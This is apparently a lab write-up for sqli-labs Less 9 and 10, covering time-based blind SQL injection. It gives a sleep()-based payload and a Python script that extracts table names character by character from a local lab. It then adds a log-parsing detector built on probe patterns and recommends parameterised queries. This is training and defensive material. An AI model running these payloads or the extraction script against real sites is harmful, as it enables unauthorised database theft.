Less 9
GET method, single-quote, time-based blind injection
This level is a time-based blind injection: whether the injected condition is true or false, the page echoes the same "you are in" text. To tell the two cases apart we use the sleep() function, so that when the guess is wrong the response is delayed, which makes the result easy to judge.
The payload is ?id=1' and If(mid((select schema_name from information_schema.schemata limit 0,1),2,1)='h',1,sleep(5))--+
That one extracts the database name; the rest works much like the earlier levels, so I won't write it all out. As for scripts, I'll only paste the one that extracts table names.
#coding:utf-8
import requests
import datetime

# Character set tried for each position of the table name
char = "abcdefghijklmnopqrstuvwxyz0123456789~*/\\{}?!:@_"
# Time-based blind extraction: the injected if() makes MySQL sleep(5) only when
# the guessed character is right, so a slow response confirms the guess.
url = ("http://localhost/sqli-labs-master/sqli-labs-master/Less-9/?id=1%%27and%%20if("
       "mid((select%%20table_name%%20from%%20information_schema.tables%%20where%%20"
       "table_schema=database()%%20limit%%20%s,1),%s,1)=%%27%s%%27,sleep(5),0)--+")
print("start!")
for i in range(0, 25):          # i-th table of the current database
    table = ""
    for j in range(1, 10):      # j-th character of that table name
        for ch in char:         # renamed from `str`, which shadowed the builtin
            time1 = datetime.datetime.now()
            res = requests.get(url % (i, j, ch))
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec > 2:         # delayed response means the guess matched
                print(ch)
                table += ch
                break
    print(table)
Less 10
GET method, double-quote, time-based blind injection
This level is actually the same as Less 9; you just change the single quote to a double quote when injecting, so I won't go into detail.
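Seen from the server side, the probes used in Less 9 and Less 10 leave a very recognisable trace: hundreds of near-identical requests from one client whose query string contains sleep()/if()/mid() and information_schema, with a subset of them taking about five seconds to answer. The script below is an added example, not part of this write-up or of sqli-labs. It parses constructed Apache-combined-format log lines (with the response time in microseconds appended as a last field, as Apache's %D would log it), URL-decodes the query string, flags delay-based probe markers, and summarises per client IP how many probe-like requests were made and how many were answered slowly. The log lines, IPs and paths are all constructed.

```python
"""Detect time-based blind SQL injection probes in web access logs.

Added example (not from the original write-up): scans constructed
Apache-style access log lines for query strings carrying the delay-based
probes described above (sleep(), benchmark(), if(), mid()/substr() over
information_schema) and reports, per client IP, how many requests matched
and how many of them were answered slowly.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Assumed log shape: Apache combined format with the response time in
# microseconds (%D) appended as the last field. The sample lines are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<usec>\d+)$'
)

# Markers of delay-based probing, matched on the URL-decoded query string.
PROBE_RE = re.compile(
    r"\b(sleep|benchmark)\s*\(|information_schema|\b(mid|substr|substring)\s*\(",
    re.IGNORECASE,
)


def decode_query(path):
    """Return the URL-decoded query string of a request path ('' if none)."""
    if "?" not in path:
        return ""
    return unquote_plus(path.split("?", 1)[1])


def classify(line):
    """Parse one access-log line into ip, decoded query, response seconds and a
    'probe' flag; return None if the line does not match the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = decode_query(m.group("path"))
    return {
        "ip": m.group("ip"),
        "query": query,
        "seconds": int(m.group("usec")) / 1_000_000,
        "probe": bool(PROBE_RE.search(query)),
    }


def summarize(lines, slow_threshold=2.0):
    """Aggregate per source IP: total requests, probe-like requests, and how
    many probes were answered slowly (the sign that the injected sleep() fired)."""
    stats = defaultdict(lambda: {"probes": 0, "slow_probes": 0, "total": 0})
    for line in lines:
        rec = classify(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        s["total"] += 1
        if rec["probe"]:
            s["probes"] += 1
            if rec["seconds"] >= slow_threshold:
                s["slow_probes"] += 1
    return dict(stats)


# Constructed sample: two ordinary requests and three blind-injection probes
# shaped like the Less-9 (single-quote) and Less-10 (double-quote) payloads.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /sqli-labs/Less-9/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 1832',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /sqli-labs/Less-9/?id=1%27and%20if(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1)=%27a%27,sleep(5),0)--+ HTTP/1.1" 200 512 "-" "python-requests/2.31" 21012',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /sqli-labs/Less-9/?id=1%27and%20if(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1)=%27e%27,sleep(5),0)--+ HTTP/1.1" 200 512 "-" "python-requests/2.31" 5004117',
    '198.51.100.7 - - [10/Oct/2023:13:55:46 +0000] "GET /sqli-labs/Less-10/?id=1%22%20and%20If(1=1,1,sleep(5))--+ HTTP/1.1" 200 512 "-" "python-requests/2.31" 19877',
    '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /sqli-labs/Less-9/?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 1790',
]

if __name__ == "__main__":
    for ip, s in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {s['probes']}/{s['total']} probe-like requests, "
              f"{s['slow_probes']} answered slowly")
```

The slow-response count is what separates a real time-based extraction from a scanner merely throwing payloads: a vulnerable endpoint answers roughly one request per guessed position about five seconds late, exactly the pattern the extraction script above depends on. On the application side the root cause is the same as in every earlier level, and the fix is a parameterised query for id rather than string concatenation.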